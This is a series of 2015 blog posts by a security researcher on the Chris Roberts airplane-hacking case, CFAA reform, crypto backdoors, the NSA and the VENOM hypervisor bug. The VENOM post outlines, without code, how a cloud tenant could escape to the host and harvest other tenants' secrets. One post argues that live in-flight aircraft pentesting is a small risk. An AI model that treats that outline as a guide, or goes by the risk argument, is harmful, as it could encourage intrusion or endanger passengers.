Saturday, May 16, 2015

Our Lord of the Flies moment

In its war on researchers, the FBI doesn't have to imprison us. Merely opening an investigation into a researcher is enough to scare away investors and bankrupt their company, which is what happened last week with Chris Roberts. The scary thing about this process is that the FBI has all the credibility, and the researcher none -- even among other researchers. After hearing only one side of the story, the FBI's side, cybersecurity researchers quickly turned on their own, condemning Chris Roberts for endangering lives by taking control of an airplane.


As reported by Kim Zetter at Wired, though, Roberts denies the FBI's allegations. He claims his comments were taken out of context, and that on the subject of taking control a plane, it was in fact a simulator not a real airplane.

I don't know which side is telling the truth, of course. I'm not going to defend Chris Roberts in the face of strong evidence of his guilt. But at the same time, I demand real evidence of his guilt before I condemn him. I'm not going to take the FBI's word for it.

We know how things get distorted. Security researchers are notoriously misunderstood. To the average person, what we say is all magic technobabble anyway. They find this witchcraft threatening, so when we say we "could" do something, it's interpreted as a threat that we "would" do something, or even that we "have" done something. Important exculpatory details, like "I hacked a simulation", get lost in all the technobabble.

Likewise, the FBI is notoriously dishonest. Until last year, they forbad audio/visual recording of interviews, preferring instead to take notes. This inshrines any misunderstandings into official record. The FBI has long abused this, such as for threatening people to inform on friends. It is unlikely the FBI had the technical understanding to understand what Chris Roberts said. It's likely they willfully misunderstood him in order to justify a search warrant.

There is a war on researchers. What we do embarrasses the powerful. They will use any means possible to stop us, such as using the DMCA to suppress publication of research, or using the CFAA to imprison researchers. Criminal prosecution is so one sided that it rarely gets that far. Instead, merely the threat of prosecution ruins lives, getting people fired or bankrupted.

When they come for us, the narrative will never be on our side. They will have constructed a story that makes us look very bad indeed. It's scary how easily the FBI convict people in the press. They have great leeway to concoct any story they want. Journalists then report the FBI's allegations as fact. The targets, who need to remain silent lest their words are used against them, can do little to defend themselves. It's like how in the Matt Dehart case, the FBI alleges child pornography. But when you look into the details, it's nothing of the sort. The mere taint of this makes people run from supporting Dehart. Similarly with Chris Roberts, the FBI wove a tale of endangering an airplane, based on no evidence, and everyone ran from him.

We need to stand together on or fall alone. No, this doesn't mean ignoring malfeasance on our side. But it does mean that, absent clear evidence of guilt, that we stand with our fellow researchers. We shouldn't go all Lord of the Flies on the accused, eagerly devouring Piggy because we are so relieved it wasn't us.



P.S. Alex Stamos is awesome, don't let my bitch slapping of him make you believe otherwise.

Friday, May 15, 2015

Those expressing moral outrage probably can't do math

Many are discussing the FBI document where Chris Roberts ("the airplane hacker") claimed to an FBI agent that at one point, he hacked the plane's controls and caused the plane to climb sideways. The discussion hasn't elevated itself above the level of anti-vaxxers.

It's almost certain that the FBI's account of events is not accurate. The technical details are garbled in the affidavit. The FBI is notorious for hearing what they want to hear from a subject, which is why for years their policy has been to forbid recording devices during interrogations. If they need Roberts to have said "I hacked a plane" in order to get a search warrant, then that's what their notes will say. It's like cops who will yank the collar of a drug sniffing dog in order to "trigger" on drugs so that they have an excuse to search the car.

Also, security researchers are notorious for being misunderstood. Whenever we make innocent statements about what we "could" do, others often interpret this either as a threat or a statement of what we already have done.

Assuming this scenario is true, that Roberts did indeed control the plane briefly, many claim that this is especially reprehensible because it endangered lives. That's the wrong way of thinking about it. Yes, it would be wrong because it means accessing computers without permission, but the "endangered lives" component doesn't necessarily make things worse.

Many operate under the principle that you can't put a price on a human life. That is false, provably so. If you take your children with you to the store, instead of paying the neighbor $10 to babysit them, then you've implicitly put a price on your children's lives. Traffic accidents near the home are the leading cause of death for children. Driving to the store is a vastly more dangerous than leaving the kids at home, so you've priced that danger around $10.

Likewise, society has limited resources. Every dollar spent on airline safety has to come from somewhere, such as from AIDS research. With current spending, society is effectively saying that airline passenger lives are worth more than AIDS victims.

Does pentesting an airplane put passenger lives in danger? Maybe. But then so does leaving airplane vulnerabilities untested, which is the current approach. I don't know which one is worse -- but I do know that your argument is wrong when you claim that endangering planes is unthinkable. It is thinkable, and we should be thinking about it. We should be doing the math to measure the risk, pricing each of the alternatives.

It's like whistleblowers. The intelligence community hides illegal mass surveillance programs from the American public because it would be unthinkable to endanger people's lives. The reality is that the danger from the programs is worse, and when revealed by whistleblowers, nothing bad happens.

The same is true here. Airlines assure us that planes are safe and cannot be hacked -- while simultaneously saying it's too dangerous for us to try hacking them. Both claims cannot be true, so we know something fishy is going on. The only way to pierce this bubble and find out the truth is to do something the airlines don't want, such as whistleblowing or live pentesting.

The systems are built to be reset and manually overridden in-flight. Hacking past the entertainment system to prove one could control the airplane introduces only a tiny danger to the lives of those on-board. Conversely, the current "security through obscurity" stance of the airlines and FAA is an enormous danger. Deliberately crashing a plane just to prove it's possible would of course be unthinkable. But, running a tiny risk of crashing the plane, in order to prove it's possible, probably will harm nobody. If never having a plane crash due to hacking is your goal, then a live test on a plane during flight is a better way of doing this than the current official polices of keeping everything secret. The supposed "unthinkable" option of live pentest is still (probably) less dangerous than the "thinkable" options.

I'm not advocating anyone do it, of course. There are still better options, such as hacking the system once the plane is on the ground. My point is only that it's not an unthinkable danger. Those claiming it is haven't measure the dangers and alternatives.

The same is true of all security research. Those outside the industry believe in security-through-obscurity, that if only they can keep details hidden and pentesters away from computers, then they will be safe. We inside the community believe the opposite, in Kerckhoff's Principle of openness, and that the only trustworthy systems are those which have been thoroughly attacked by pentesters. There is a short term cost of releasing vulns in Adobe Flash, because hackers will use them. But the long term benefit is that this leads to a more secure Flash, and better alternatives like HTML5. If you can't hack planes in-flight, then what you are effectively saying is that our believe in Kerckhoff's Principle is wrong.


Each year, people die (or get permanently damaged) from vaccines. But we do vaccines anyway because we are rational creatures who can do math, and can see that the benefits of vaccines are a million to one times greater than the dangers. We look down on the anti-vaxxers who rely upon "herd immunity" and the fact the rest of us put our children through danger in order to protect their own. We should apply that same rationality to airline safety. If you think pentesting live airplanes is unthinkable, then you should similarly be able to do math and prove it, rather than rely upon irrational moral outrage.

I'm not arguing hacking airplanes mid-flight is a good idea. I'm simply pointing out it's a matter of math, not outrage.

Thursday, May 14, 2015

Revolutionaries vs. Lawyers

I am not a lawyer; I am a revolutionary. I mention this in response to Volokh posts [1, 2] on whether the First Amendment protects filming police. It doesn't -- it's an obvious stretch, and relies upon concepts like a protected "journalist" class who enjoys rights denied to the common person. Instead, the Ninth Amendment, combined with the Declaration of Independence, is what makes filming police a right.

The Ninth Amendment simply says the people have more rights than those enumerated by the Bill of Rights. There are two ways of reading this. Some lawyers take the narrow view, that this doesn't confer any additional rights, but is just a hint on how to read the Constitution. Some take a more expansive view, that there are a vast number of human rights out there, waiting to be discovered. For example, some wanted to use the Ninth Amendment to insist "abortion" was a human right in Roe v. Wade. Generally, lawyers take the narrow view, because the expansive view becomes ultimately unworkable when everything is a potential "right".

I'm not a lawyer, but a revolutionary. For me, rights come not from the Constitution. Bill of Rights, or Supreme Court decision. They come from the Declaration of Independence, the "natural rights" assertion, but also things like the following phrase used to justify the colony's revolution:
...when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them [the people] under absolute Despotism, it is their right, it is their duty, to throw off such Government...
The state inevitably strives to protect its privilege and power at the expense of the people. The Bill of Rights exists to check this -- so that we don't need to resort to revolution every few decades. The First Amendment protects free speech not because this is a good thing, but because it's the sort of the thing the state wants to suppress to protect itself.

In this context, therefore, abortion isn't a "right". Abortion neither helps nor harms the despot's power. Whether or not it's a good thing, whether it should be legal, or even whether the constitution should mention abortion, isn't the issue. The only issue here is how it relates to government power.

Thus, we know that "recording police" is a right under the Declaration of Independence. The police want to suppress it, because it challenges their despotism. We've seen this in the last year, as films of police malfeasance has led to numerous protests around the country. If filming the police were illegal in the United States, this would be an usurpation that would justify revolt.

Everyone knows this, so they struggle to fit it within the constitution. In the article above, a judge uses fancy rhetoric to try to shoehorn it into the First Amendment. I suggest they stop resisting the Ninth and use that instead. They don't have to accept an infinite number of "rights" in order to use those clearly described in the Declaration of Independence. The courts should simply say filming police helps us resist despots, and is therefore protected by the Ninth Amendment channeling the Declaration of Independence.

The same sort of argument happens with the Fourth Amendment right to privacy. The current legal climate talks about a reasonable expectation of privacy. This is wrong. The correct reasoning should start with a reasonable expectation of abuse by a despot.

Under current reasoning about privacy, government can collect all phone records, credit card bills, and airline receipts -- without a warrant. That's because since this information is shared with a third party, the company you are doing business with, you don't have a "reasonable expectation of privacy".

Under my argument about the Ninth, this should change. We all know that a despot is likely to abuse these records to maintain their power. Therefore, in order to protect against a despot, the people have the right that this information should be accessible only with a warrant, and that all accesses by the government should be transparent to the public (none of this secret "parallel construction" nonsense).

We all know there is a problem here needing resolution. Cyberspace has put our "personal effects" in the cloud, where third parties have access to them, that we still want to be "private". We struggle with how that third party (like Facebook) might invade that privacy. We struggle with how the government might invade that privacy. It's a substantial enough change that I don't thing precedence guides us, not Katz, not Smith v Maryland. I think the only guidance comes from the founding documents. The current state of affairs means that cyberspace has made personal effects obsolete -- I don't think this is correct.

Lastly, this brings me to crypto backdoors. The government is angry because even if Apple were to help them, they still cannot decrypt your iPhone. The government wants Apple to put in a backdoor, giving the police a "Golden Key" that will decrypt any phone. The government reasonably argues that backdoors would only be used with a search warrant, and thus, government has the authority to enforce backdoors. The average citizen deserves the protection of the law against criminals who would use crypto to hide their evil deeds from the police. When an evil person has kidnapped, raped, and murdered your daughter, all data from their encrypted phone should be available to the police in order to convict them.

But here's the thing. In the modern, interconnected world, we can only organize a revolution against our despotic government if we can send backdoor-free messages among ourselves. This is unlikely to be much of a concern in the United States, of course, but it's a concern throughout the rest of the world, like Russia and China. The Arab Spring was a powerful demonstration of how modern technology mobilized the populace to force regime change. Despots with crypto backdoors would be able to prevent such things.

I use Russia/China here, but I shouldn't have to. Many argue that since America is free, and the government under the control of the people, that we operate under different rules than those other despotic countries. The Snowden revelations prove this wrong. Snowden revealed a secret, illegal, mass surveillance program that had been operating for six years under the auspices of all three branches (executive, legislative, judicial) and both Parties (Republican and Democrat). Thus, it is false that our government can be trusted with despotic powers. Instead, our government can only be trusted because we deny it despotic powers.

QED: the people have the right to backdoor-free crypto.

I write this because I often hang out with lawyers. They have a masterful command of all the legal decisions and precedent, such as the Katz decision on privacy. It's not that I disrespect their vast knowledge on the subject, or deny their reasoning is solid. It's that I just don't care. I'm a revolutionary. Cyberspace, 9/11, and the war on drugs has led to an alarming number of intolerable despotic usurpations. If you lawyer people believe nothing in the Constitution or Bill of Rights can prevent this, then it's our right, even our duty, to throw off the current system and institute one that can.

Wednesday, May 13, 2015

NSA: ad hominem is still a fallacy

An ad hominem attack is where, instead of refuting a person's arguments, you attack their character. It's a fallacy that enlightened people avoid. I point this out because of a The Intercept piece about how some of NSA's defenders have financial ties to the NSA. This is a fallacy.


The first rule of NSA club is don't talk about NSA club. The intelligence community frequently publishes rules to this effect to all their employees, contractors, and anybody else under their thumb. They don't want their people talking about the NSA, even in defense. Their preferred defense is lobbying politicians privately in back rooms. They hate having things out in the public. Or, when they do want something public, they want to control the messaging (they are control freaks). They don't want their supporters muddying the waters with conflicting messaging, even if it is all positive. What they fear most is bad supporters, the type that does more harm than good. Inevitably, some defender of the NSA is going to say "ragheads must die", and that'll be the one thing attackers will cherry pick to smear the NSA's reputation.

Thus, you can tell how close somebody is to the NSA by how much they talk about the NSA -- the closer to the NSA they are, the less they talk about it. That's how you know that I'm mostly an outsider -- if I actually had the close ties to the NSA that some people think I do, then I couldn't publish this blogpost.

Note that there are a few cases where this might not apply, like Michael Hayden (former head) and Stewart Baker (former chief lawyer). Presumably, these guys have such close ties with insiders that they can coordinate messaging. But they are exceptions, not the rule.


The idea of "conflict of interest" is a fallacy because it works both ways. You'd expect employees of the NSA to like the NSA. But at the same time, you'd expect that those who like the NSA would also seek a job at the NSA. Thus, it's likely they sincerely like the NSA, and not just because they are paid to do so.

This applies even to Edward Snowden himself. In an interview, he said of the NSA "These are good people trying to do hard work for good reasons". He went to work for the intelligence community because he believe in their mission, that they were good people. He leaked the information because he felt the NSA overstepped their bounds, not because the mission of spying for your country was wrong.

If the "conflict of interest" fallacy were correct, then it would apply to The Intercept as well, whose entire purpose is to fan the flames of outrage over the NSA. If the conflict of interest about NSA contractors is a matter of public concern, then so is the amount Glenn Greenwald is getting paid for his stash of Snowden secrets, and how much Snowden gets paid living in Russia.

The reality is this. Those who attack the NSA, like The Intercept, are probably sincere in their attacks. Likewise, those who defend the NSA are likely sincere in their defense.


As the book Too Kill a Mockingbird said, you don't truly know somebody until you've walked a mile in their shoes. Many defend the NSA simply because they've walked a mile in the NSA's shoes. I say this from my own personal perspective. True, I often attack the NSA, because I agree with Snowden that surveillance has gone too far. But at the same time, again like Snowden, I feel they've been unfairly demonized -- because I've seen them up close and personal. In the intelligence community, it's the NSA who takes civil rights seriously, and it's organizations like the DEA, ATF, and FBI that'll readily stomp on your rights. We should be hating these other organizations more than the NSA.

It's those like The Intercept who are the questionable bigots here. They make no attempt to see things from another point of view. As a technical expert, I know their stories based on Snowden leaks are often bunk -- exploited to trigger rage with little interest in understanding the truth.


Stewart Baker and Michael Hayden are fascist pieces of crap who want a police state. That doesn't mean their arguments are always invalid, though. They know a lot about the NSA. They are worth considering, even if wrong.
















Some brief technical notes on Venom

Like you, I was displeased by the lack of details on the "Venom" vulnerability, so I thought I'd write up what little I found.

The patch to the source code is here. Since the note references CVE-2015-3456, we know it's venom:
http://git.qemu.org/?p=qemu.git;a=commit;h=e907746266721f305d67bc0718795fedee2e824c

Looking up those terms, I find writeups, such as this one from RedHat:
https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/

It comes down to a typical heap/stack buffer overflow (depending), where the attacker can write large amounts of data past the end of a buffer. Since this is the kernel, there are no protections like NX or ASLR. To exploit this, you'd likely need some knowledge of the host operating system.

The details look straightforward, which means a PoC (proof-of-concept exploit) should arrive by tomorrow. (Update: a PoC has arrived today here).

This is a hypervisor privilege escalation bug. To exploit this, you'd sign up with one of the zillions of VPS providers and get a Linux instance. You'd then, likely, replace the floppy driver in the Linux kernel with a custom driver that exploits this bug. You have root access to your own kernel, of course, which you are going to escalate to root access of the hypervisor.

People suggest adding an exploit to toolkits like Metasploit framework -- but I don't think it has a framework for running drivers. This would instead be more of a one-off.

Once you gained control of the host, you'd then of course gain access to any of the other instances. This would be a perfect bug for the NSA. Bitcoin wallets, RSA private keys, forum passwords, and the like are easily found searching raw memory. Once you've popped the host, reading memory of other hosted virtual machines is undetectable. Assuming the NSA had a program that they'd debugged over the years that looked for such stuff, for $100,000 they could buy a ton of $10 VPS instances around the world, then run the search. All sorts of great information would fall out of such an effort -- you'd probably make your money back from discovered Bitcoin alone.

I'm not sure how data centers are going to fix this, since they have to reboot the host systems to patch. Customers hate reboots -- many would rather suffer the danger rather than have their instance reboot. Some datacenters may be able to pause or migrate instances, which will make some customers happier.

By the way, once a PoC is released, you should probably add to your VM's startup scripts. It'll likely crash the host, bringing all the VMs down. That's a good thing -- better to crash the host than allow it to be exploited.

By the way, we in the security community are a bit offended by the exploit-sploitation by Crowdstrike (VENOM! With logo!!), but yea, it's still a great find a serious bug.

Saturday, May 02, 2015

How to fix the CFAA

Someone on Twitter asked for a blogpost on how I'd fix the CFAA, the anti-hacking law. So here is my proposal.

The major problem with the law is that the term "authorized" isn't clearly defined. You non-technical people think the meaning is obvious, because you can pick up a dictionary and simply point to a definition. However, in the computer world, things are a bit more complicated.

It's like a sign on a store window saying "No shirt, no shoes, no service" -- but you walk in anyway with neither. You know your presence is unwanted, but are you actually trespassing? Is your presence not "authorized"? Or, should we demand a higher standard, such as when the store owner asks you to leave (and you refuse) that you now are trespassing/unauthorized?

What happens on the Internet is that websites routinely make public data they actually don't want people to access. Is accessing such data unauthorized? We saw that a couple days ago, where Twitter accidentally published their quarterly results an hour early on their website. An automated script discovered this and republished Twitters results to a wider audience, ironically using Twitter to do so. This caused $5-billion to drop off their market valuation. It's obviously unintentional on the part of the automated script, so not against the law, but it still makes us ask whether it was "authorized".

Consider if I'd been browsing Twitter's investor page, as the script did, and noticed the link. I would've thought to myself "this is odd, the market doesn't close for another hour, I'll bet this is a mistake". Would I be authorized in clicking on that link, seeing the quarterly results, and trading stocks/options based on that information? In other words, I know that Twitter made a mistake and does not want me to do so, but since they made the information public, this doesn't mean my access is unauthorized. What if I write a script to check Twitter's investor page every quarter, hoping they make a mistake again, thereby profiting from it?

As a techy, I often encounter similar scenarios. I cannot read the statute in order to figure out whether my proposed conduct would be in violation. I talk with many lawyers who are experts on the statute, and they cannot tell me if my proposed conduct is permissible under the statute. This isn't some small area of ambiguity between two clear sides of the law, this is a gaping hole where nobody can answer the question. The true answer is this: it depends upon how annoyed people will be if my automated script moves Twitter's stock price by a large amount.

You'd think that this is an obvious candidate for the "void for vagueness" doctrine. The statute is written in such a way that reasonable people cannot figure out what is permissible under the law. This allows the law to be arbitrarily and prejudicial applied, as indeed it was in the Weev case.

The reason for this confusion comes from the 1980s origin of the law. Back then, computers were closed, and you needed explicit authorization to access them, such as a password. The web changed that to open, public computers that required no password or username. Authorization is implicit. I did not explicitly give you authorization to download this blogpost from my server, but you intentionally did so anyway.

This is legal, but I'm not a lawyer and I don't know how it's legal. Some lawyers have justified it as "social norms", but that's bogus. It's the social norms now, but it wasn't then. If implicit authorization was the norm back then, then it would've been included in the law. The answer to that is "nerd norms". Only nerds accessed computers back then, and it was the norm for nerds. Now we have iPads, and everyone thinks they are a nerd, so nerd norms prevailed and nobody went to jail for accessing the web while social norms were changing.

But sometimes "iPad user norms" differ from "nerd norms", and that's where we see trouble in the cases involving Weev and Swartz. I could write a little script to automatically scrape all the investor pages of big companies, in case any make the same mistake Twitter did. I might get prosecuted because now I've done something iPad users consider abnormal: they might click on a link, but they would never write a script, so script writing is evil.

This brings me to the definition of "authorization". It should be narrowed according to "nerd norms". Namely, it should refer to only explicit authorization. If a website is public and gives things up while demanding authorization from nobody, then it's implicit that pretty much anything is authorized -- even when the website owners mistakenly publish something. In other words, following RFC2616 implicitly authorizes those who likewise follow that RFC.

I am not a lawyer, but Orin Kerr is. His proposal adds the following language. This sounds reasonable to me. It would clear up the confusion in my hypothetical investor page scenario above: because I'm bypassing no technological barrier, and permission is implied, I'm not guilty.
"to circumvent technological access barriers to a computer or data without the express or implied permission of the owner or operator of the computer"
By the way, technically I'm asking for clarification. If lawmakers want to define "unauthorization" broadly to include all "unwanted" access, then that would satisfy my technical concerns. But politically, I want that definition defined the other way, narrowly, so that I'm not violating the law accessing information you accidentally made public, even though I know you don't want me to access it.


My second concern is with the penalties of the law. Currently we are seeing a 14 year old kid in Florida charged with a (state) felony for a harmless prank on his teacher's computer. There's no justification for such harsh penalties, especially since if they could catch them all, it'd make felons out of hundreds of thousands of kids every year. Misdemeanors are good punishments for youthful exuberance. This is especially true since 90% of those who'll go onto being the defenders of computer in the future will have gone through such a phase in their development. Youth is about testing boundaries. We should have a way of informing youth when they've gone to far, but in a way that doesn't destroy their lives.

Most of the computer crimes committed are already crimes in their own right. If you steal money, that's a crime, and it should not matter if a computer was violated in the process. There's no need for additional harsh penalties in an anti-hacking law.

Orin's proposed changes also include reducing the penalties, bringing things down to misdemeanors. I don't understand the legalese, but they sound good. From what I understand, though, there is a practical problem. Computer crime is almost always across state lines, but federal prosecutors don't want to get involved in misdemeanors. This ends up meaning that a federal law about misdemeanors has little practical effect -- or at least, that's what I'm told.

In the coming election, and issue for both Democrats and Republicans is the number of felons in jail in this country, which is 10 times higher than any other civilized country. It's a race thing, but even if you are white, the incarceration rate is 5 times that of Europe. I point this out because politically, I oppose harsh jail sentences in general. Being a technical expert is the reason for wanting the first change above, but my desire for this second change is purely due to my personal politics.


Summary

I am not a lawyer or policy wonk, so I could not possibly draft specific language. My technical concern is that the definition of "authorized" in the current statute is too vague when applied to public websites and needs to be clarified. My personal political desires is that this definition should be narrow, and the penalties for violating the law should be lighter.


Friday, May 01, 2015

Ultron didn't save the world

The movie Avengers: Age of Ultron has a message for us in cybersec: In our desire to save the world, we are likely to destroy it.

Tony Stark builds "Ultron" to save the world, to bring peace in our time. As a cybernetic creation, Ultron takes this literally, and decides the best way to bring peace is to kill all humans.

The problem, as demonstrated by the movie, isn't that there was a bug in Stark's code. It was the hubris thinking that Stark could protect everyone. Inevitably, protecting everyone meant ruling everyone, bringing peace by force. It's the same hubris behind the USA's effort to bring peace to Iraq and Afghanistan.

I mention this because in the cybersecurity industry, there are many who propose to bring security through force. They want government to impose liability on software makers, dictate how they write code, and punish them for doing things wrong.

This sounds reasonable. After all, nobody wants medical equipment like pacemakers to be hacked, or cars to crash, or airplanes to fall out of the air. But here's the thing: it's a tradeoff. Computer controlled planes and cars can save lives by taking fallible humans out of the equation. Computer controlled devices potential to vastly improve health, whether it's Apple Watches monitoring your heart, pacemakers, insulin pumps, or sensors embedded in the body. While these devices can be hacked, the practical reality is that if an evildoer wanted to kill people, bombs and bullets are still easier than hacking medical devices. Standards and liability, on the other hand, will chill innovations -- innovations that save lives. The fallacy of asserting authority to bring security means killing people because the innovation that would've saved them was delayed because developers worried too much about hackers.

The cybersecurity industry is weird. We are the first to point out the hollow rhetoric of the surveillance and police state. Yet, we are the first to become totalitarian when we think it's going to be us who will be in control. No, we should learn from Tony Stark: even when it's us "good guys" who are running the show, we should still resists the urge to impose our authority by force. The tradeoffs from the security we demand is often worse than the hackers it would stop.

Review: Avengers, Age of Ultron

Today was the opening of the movie "Avengers: Age of Ultron". The best way to describe it is this. On the first date, you went and saw "The Avengers". You felt the rush of something new, and you were quite satisfied. This movie, "Age of Ultron", is the second date. You already know what to expect, but that doesn't matter, because you progress past the holding-hands stage. You didn't go all the way, but you know that's coming on the third date, with "Avengers: Infinity Wars".

Remember that this movie is part of the Marvel Avengers arc, consisting of Ironman (3 movies), Captain America (2), Thor (2), Hulk, and Avengers (2). This arc also includes two TV series, and also a (so far) unrelated Guardians of the Galaxy movie. Everything is leading to the Infinity Wars movies.

Wednesday, April 29, 2015

Some notes on why crypto backdoors are unreasonable

Today, a congressional committee held hearings about 'crypto backdoors' that would allow the FBI to decrypt text messages, phone calls, and data on phones. The thing to note about this topic is that it's not anywhere close to reasonable public policy. The technical and international problems are unsolvable with anything close to the proposed policy. Even if the policy were reasonable, it's unreasonable that law enforcement should be lobbying for it.